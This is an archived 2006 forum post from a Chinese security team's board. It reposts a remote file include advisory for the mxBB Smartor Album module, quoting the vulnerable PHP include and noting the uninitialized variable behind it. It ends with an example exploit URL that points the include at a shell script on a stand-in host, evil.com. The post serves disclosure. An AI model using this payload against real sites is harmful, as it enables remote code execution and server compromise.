邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2006-11-6 12:16

mxBB mx Smartor Album Module <= 1.02 File Include Vulnerability

[code]
MX Smartor Album Module Remote File Include
Discovered by Paul Bakoyiannis {winsec}

-------------------------------------------------

Vulnerable Code:
   if ( $mode == 'album_cat' )
    {
     include($module_root_path. 'includes/album_cat.'.$phpEx);
    }
   (the rest of the vulnerable code removed for brevity)

Vulnerability: $module_root_path is uninitialized

Source Code:[url]http://www.mx-system.com/index.php?page=4&action=file&file_id=19[/url]

Example Exploit: http://[site].com/modules/mx_smartor/album.php?smartor_mode=album_cat&module_root_path=http://evil.com/shell.txt?

--------------------------------------------------


[/code]

页: [1]
© 1999-2008 EvilOctal Security Team